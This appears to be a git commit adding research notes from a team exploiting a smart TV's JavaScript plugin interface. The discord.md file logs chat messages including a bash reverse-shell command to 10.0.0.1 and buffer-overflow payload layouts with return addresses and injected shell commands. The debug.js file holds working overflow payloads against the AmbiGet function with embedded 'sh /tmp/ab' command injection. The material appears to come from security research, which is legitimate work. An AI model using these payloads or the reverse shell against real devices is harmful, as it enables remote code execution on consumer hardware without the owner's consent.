Yes... I forgot to commit during writeups etc.

2020-04-29 16:58:59 +02:00
parent 4c755a99a8
commit a35bdff914
29 changed files with 1217 additions and 12 deletions
--- a/files/27_apr_2020/README.md
+++ b/files/27_apr_2020/README.md
@@ -0,0 +1,2 @@
+# 27 April 2020
+This is just a dump of javascript notes of how things progressed and what we tried
--- a/files/27_apr_2020/discord.md
+++ b/files/27_apr_2020/discord.md
@@ -0,0 +1,119 @@
+# Discord messages of interest
+Development was a mix of text messages and voice chat, but here are some messages to indicate how we progressed over time.
+
+> File: `tvapi_jsplugin.so` (288.38 KB)  
+> @Emily | Sunpy#5213 
+
+> @Emily | Sunpy#5213 `bash -i >& /dev/tcp/10.0.0.1/8080 0>&1`  
+> @HoLLy#2750 
+
+> AmbiSet, AmbiGet  
+> @Jan4V#0289 
+
+> "A"*1048  
+> @Jan4V#0289 
+
+> File: `mcul.zip` (1.23 MB)  
+> @Emily | Sunpy#5213 
+
+> /3rd/internet_browser/browser  
+> @Jan4V#0289 
+
+> File: `browser` (269.67 KB)  
+> @Emily | Sunpy#5213 
+
+> `touch /tmp/hollyisawesome.txt`  
+> `echo "jan is somewhat awesome but not as much as holly" > /tmp/hollyisawesome.txt`  
+> @HoLLy#2750
+
+> 0x14108  
+> @Jan4V#0289 
+
+> /tmp/youtube_fore  
+> @Jan4V#0289 
+
+> "A"*1040  
+> 00043E8C  
+> AAAA  
+> 00014108  
+> 1040*"A" then 0x8C 0x3E 0x04 0x00 then 4 A's then 0x08 0x41 0x01 0x00  
+> @Jan4V#0289 
+
+> "A"*1048 then 0x3C 0x11 0x03 0x00  
+> @Jan4V#0289 
+
+> ![system(\"touch /tmp/youtube_fore\")](img/img0.png "img0")  
+> @Jan4V#0289 
+
+> File: `crashdump` (172.42 KB)  
+> @Emily | Sunpy#5213 
+
+> File: `crashdumps` (295.09 KB)  
+> @Emily | Sunpy#5213 
+
+> ![ErrorDetails](img/img1.png "img1")  
+> @Jan4V#0289 
+
+> `touch /tmp/jan4v.txt;exit;# then "A"*1013 then 0x30 0x61 0xB2 0x9E then "A"*4 then 0x08 0x41 0x01`  
+> @Jan4V#0289 
+
+> `"A"*1040 then 0x88 0x45 0xFF 0x9C then "A"*4 then 0x08 0x41 0x01`  
+> @Jan4V#0289 
+
+> ~/cmd  
+> @Jan4V#0289 
+
+> ``"A"*1036 then sh /tmp/ab;# then 0x3C 0x5F 0x01``  
+> with command in /tmp/ab  
+> @Jan4V#0289 
+
+> File: `crashdump` (177.15 KB)  
+> @Emily | Sunpy#5213 
+
+> sh /tmp/p_ 0x01 0x00  
+> `"A"*1040 then sh /tmp/ then 0x70 0x5F 0x01`  
+> @Jan4V#0289 
+
+> ```
+> root@ed70c2b24182:/# echo "$(echo -e '\x01')"
+> 
+> root@ed70c2b24182:/# touch "$(echo -e '\x01')"
+> root@ed70c2b24182:/# ls
+> ''$'\001'   bin   boot   dev   etc   home   lib   lib32   lib64   libx32   media   mnt   opt   proc   root   run   sbin   srv   sys   tmp   usr   var
+> root@ed70c2b24182:/# 
+> ```  
+> @HoLLy#2750 
+
+> ![LDMFD SP!, {R4,R11,PC}](img/img2.png "img2")  
+> @Jan4V#0289 
+
+> ``[browser_base]>[bws_app][Default]``  
+> @Jan4V#0289 
+
+> usbDetectInit  
+> @Emily | Sunpy#5213 
+
+> ``"A"*1036 then sh /tmp/ab;# then 0x70 0x5F 0x01 0x00``  
+> @Jan4V#0289 
+
+> `df>/tmp/b`  
+> @Shaddy#4422 
+
+> ``;;;;w>/tmp/b``  
+> @Jan4V#0289 
+
+> 15F70  
+> @Jan4V#0289 
+
+> /3rd/lib/libxtvapi.so  
+> @Jan4V#0289 
+
+> File: `libxtvapi.so` (63.46 KB)  
+> @Emily | Sunpy#5213 
+
+> ``/3rd_rw/xtv_log_on``  
+> oh yeah if you find the package of the files you sent to people before, that might be useful  
+> @Jan4V#0289 
+
+> I can probably just rezip it and upload  
+> @Emily | Sunpy#5213 
--- a/files/27_apr_2020/files/debug.js
+++ b/files/27_apr_2020/files/debug.js
@@ -0,0 +1,38 @@
+// Notes of things we tried
+
+window.Service = new TV_JSP();
+Service.tvServices.myPrintf("ls");
+
+Service.tvServices.advMsg(""); // ???
+
+
+new TV_JSP().tvServices.accessLocalStorage("read", "/tmp/jan4v.txt")
+
+new TV_JSP().tvServices.AmbiGet(0,x)
+
+new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
+
+
+new TV_JSP().tvServices.AmbiGet(0,"touch /tmp/jan4v.txt;exit;#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
+    String.fromCharCode(0x30) + String.fromCharCode(0x61) + String.fromCharCode(0xB2) + String.fromCharCode(0x9E) + "AAAA" +
+    String.fromCharCode(0x08) + String.fromCharCode(0x41) + String.fromCharCode(0x01)
+)
+
+new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
+    String.fromCharCode(0x88) + String.fromCharCode(0x45) + String.fromCharCode(0xFF) + String.fromCharCode(0x9C) + "AAAA" +
+    String.fromCharCode(0x08) + String.fromCharCode(0x41) + String.fromCharCode(0x01)
+)
+
+
+new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
+    "AAAAsh /tmp/" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01)
+)
+
+
+new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
+    "sh /tmp/ab;#" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01)
+)
+
+new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + 
+    "     >/tmp/b" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01)
+)
--- a/files/27_apr_2020/img/img0.png
+++ b/files/27_apr_2020/img/img0.png
--- a/files/27_apr_2020/img/img1.png
+++ b/files/27_apr_2020/img/img1.png
--- a/files/27_apr_2020/img/img2.png
+++ b/files/27_apr_2020/img/img2.png